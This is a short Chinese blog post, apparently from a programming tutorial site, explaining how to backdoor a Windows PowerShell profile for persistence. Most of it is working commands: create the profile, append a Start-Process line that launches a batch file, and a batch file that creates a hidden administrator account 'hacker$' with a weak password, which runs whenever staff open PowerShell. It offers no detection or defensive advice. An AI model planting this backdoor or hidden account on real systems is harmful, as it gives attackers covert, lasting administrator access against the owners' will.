PowerShell配置文件后门
2021/12/19 7:19:36
本文主要是介绍PowerShell配置文件后门,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
PowerShell 配置文件是在 PowerShell 启动时运行的脚本。
在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。
案例
echo $profile Test-path $profile # 结果返回false,表示没有该文件 New-Item –Path $Profile –Type File –Force # 强制创建一个 $string = 'Start-Process "C:\ProgramData\1.bat"' $string | Out-File -FilePath $profile -Append # 把变量$string内容写入到配置文件 more $profile
1.bat
net user hacker$ 123456 /add && net localgroup administrators hacker$ /add
运维人员只要打开powershell,就会执行`1.bat`脚本。
这篇关于PowerShell配置文件后门的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2022-09-14SharePoint 2019 用 PowerShell将启用发布功能站点网站集另存为模板
- 2022-08-30PowerShell教程 - 程序性能和BUG分析工具
- 2022-08-30PowerShell教程 - 模块管理(Modules Management)
- 2022-08-29PowerShell教程 - Web requests(Web请求)
- 2022-08-26PowerShell教程 - 日期时间管理(Date & Time Management)
- 2022-08-25PowerShell教程 - 磁盘与硬件管理(Disk & Hardware Management)
- 2022-08-25PowerShell教程 - 系统事件管理(System Event Management)
- 2022-08-25PowerShell教程 - 文件系统管理(File System Management)
- 2022-08-24PowerShell教程 - 网络管理(Network Management)
- 2022-08-24PowerShell